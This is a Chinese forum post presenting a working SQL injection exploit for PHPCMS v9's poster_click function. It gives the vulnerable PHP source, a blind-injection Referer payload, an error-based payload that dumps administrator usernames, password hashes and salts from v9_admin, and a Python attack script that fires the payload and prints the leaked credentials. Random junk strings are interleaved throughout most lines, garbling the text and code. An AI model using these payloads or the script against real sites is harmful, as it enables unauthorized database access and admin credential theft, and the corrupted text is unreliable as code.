有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:+ {3 I, I( _! l5 N) B3 h7 S' o4 n
, @! x+ j3 q4 a/ N% \) j7 @
问题函数\phpcms\modules\poster\index.php
5 v1 D- g2 |( Q9 V! a$ x! O% j# c$ |& t Q" u- C
public function poster_click() {
, c# [8 J1 ]0 D( J6 W, d$id = isset($_GET['id']) ? intval($_GET['id']) : 0;# o; C3 Q1 b$ R N$ G" z
$r = $this->db->get_one(array('id'=>$id));, a( K9 E3 _4 |+ Z+ s% ^# |: v
if (!is_array($r) && empty($r)) return false;
2 a$ R1 [7 a3 z( l/ U1 \5 t1 k$ip_area = pc_base::load_sys_class('ip_area');; V( P) G# W% M c$ k; ?- A
$ip = ip();
, e# k4 K8 K" B3 P4 Q+ _$ K$area = $ip_area->get($ip);
2 @0 w* G! a' a/ e( ~, S( i, e' T$username = param::get_cookie('username') ? param::get_cookie('username') : '';6 |. v3 v2 ]+ d; ~
if($id) {. `2 e- T) m0 A0 W
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();$ [: b4 V6 A4 h7 Z$ ~# m M* a
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
+ \3 ^ p+ @+ y1 X}8 _$ Z+ I, y1 v( ^, }( L, f% R& h
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));) {7 _2 ~" o' U8 n
$setting = string2array($r['setting']);8 V* ^8 C ^$ O* C
if (count($setting)==1) {" [1 y+ O9 B' ]
$url = $setting['1']['linkurl'];
0 r$ c1 u9 ^1 w9 d} else {
' E9 H% y. |9 P' `4 p$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];7 G. G( z6 S/ F
}, w# {% V/ y; o( K9 ~! w
header('Location: '.$url);
4 v5 S4 y+ R+ E1 T- c4 |}
4 Q. I! o" c! \" ^2 G& a b6 l
+ s5 x+ [0 I2 L/ p8 ^; C
3 n d0 c9 _1 W. u
9 |3 S) H- u8 t$ N8 k! b6 X( g* i利用方式:* `5 H8 z2 |, c* n3 m" O- ]8 h1 @
' d1 E+ i8 R8 ~' D. _* h1、可以采用盲注入的手法:
# d4 j r! X7 B% @0 h' C
) D9 h8 j& o/ `referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
1 K, {) H' |# I* k# H8 y+ b
% @8 q! b3 X" \$ p通过返回页面,正常与否一个个猜解密码字段。
- {3 Y1 c( }' T+ D; R' q; E! L; @) F3 O+ _, Q
/ w) b" N1 N N3 [) Q ?2、代码是花开写的,随手附上了:
' B$ H# S+ ~, ?# Q" P
, n) {0 J3 E$ Z, y1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#$ c: J. y# u& n7 {2 p
0 ]1 @: K+ f9 M* d
此方法是爆错注入手法,原理自查。) s% i# _1 @# m" g5 i( H
1 _) i& h0 o! S* m2 w
u' y8 Y# F" m' v% m& [# E% c1 }# l; \. t
利用程序:9 P6 o/ \; z3 w7 c' O
* L9 e! h$ B2 [: B/ \0 t
#!/usr/bin/env python( ]: `) D) p8 `8 {7 C
import httplib,sys,re+ |0 Y0 O& W- E. r" X4 q; k
# K; U7 Q& I/ B' p9 H* Rdef attack():
. E5 n# y+ V1 \% n4 c {print “Code by Pax.Mac Team conqu3r!”
h( C+ c ] F# m# m: Y6 hprint “Welcome to our zone!!!”
2 s! k% d. y$ ~, ]- J, rurl=sys.argv[1]8 J1 D0 v8 `8 l G, x' E8 T
paths=sys.argv[2]: ]5 p u, D% C/ G+ [$ O' I. n
conn = httplib.HTTPConnection(url)
& t" U: S. B, X4 u6 J4 s& gi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
* _1 Y1 M- _8 M“Accept”: “text/plain”,
+ @+ n A) Y% _) @0 L0 I“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}* V- X6 K* m0 |( y& P! z. |
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)+ K$ ^9 ~2 Q; y) P' X3 I" x7 u: Q/ @
r1 = conn.getresponse()
) \7 y1 i6 Y, m$ B/ E, l& c+ P; [datas=r1.read()
! D* _! Z4 r4 @- ydatas=re.findall(r”Duplicate entry \’\w+’”, datas)
4 E! g& s; l: \" H, {9 \print datas[0]1 D; {1 I' B$ Q2 c( P
conn.close()
8 n0 n4 E" i6 Y8 C! e6 Vif __name__==”__main__”:
9 y: _. `& @$ t" x) gif len(sys.argv)<3:) _0 k, k2 s A# i2 n; m
print “Code by Pax.Mac Team conqu3r”
! ~0 V" M* j/ b$ K2 ~. m, Mprint “Usgae:”7 ~4 b4 S+ B4 Q" i& `2 \" k3 H
print “ phpcmsattack.py www.paxmac.org /”
: I% |3 G- k1 pprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
% l5 z0 @; `. ~$ ]3 Isys.exit(1)4 Y$ |5 g$ T n5 x
attack()
m4 C2 f( p5 z2 m) B4 t
c8 _: s5 l- m6 T |
发表于 2013-1-11 21:01:00
收藏
支持
反对